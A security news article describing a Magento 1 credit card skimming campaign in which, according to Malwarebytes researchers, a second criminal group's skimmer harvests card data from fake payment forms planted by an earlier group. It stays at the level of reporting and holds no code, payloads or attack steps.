The new method of attack builds on the Magento 1 campaign already known to be affecting large numbers of e-commerce sites. In late 2020, Malwarebytes identified numerous Magento 1 website being hacked, largely because Adobe had recently decided to stop supporting the platform.Often they were injected with a credit card skimmer, which Malwarebytes found is being used to develop further exploits.
“While monitoring activities tied to this Magento 1 campaign, we identified an e-commerce shop that had been targeted twice by skimmers. This in itself is not unusual, multiple infections on the same site are common,” Jérôme Segura, head of threat intelligence at Malwarebytes, said. “However this case was different. The threat actors devised a version of their script that is aware of sites already injected with a Magento 1 skimmer. That second skimmer will simply harvest credit card details from the already existing fake form injected by the previous attackers.”
Criminals in competition
The discovery of the secondary exploit is interesting as it sets criminal groups up against one another. In some of the examples found by Malwarebytes, threat actors place their own alternate version of the original skimmer on a site in the event of administrators removing the original malicious script.
Alternatively, the secondary skimmer may simply reflect that different code injections have different levels of access. In this case, the second group of criminals simply takes credentials from the first group’s fake forms.
Malwarebytes has informed the relevant e-commerce sites when it has discovered credit card skimmers in place. E-commerce sites are advised to install the latest web protection software to prevent cybercriminals from implementing these types of exploits.
Given that credit card details are one of the most valuable pieces of information that can be stolen from a site, it is hardly surprising that threat actors are starting to compete with one another for victims’ credentials.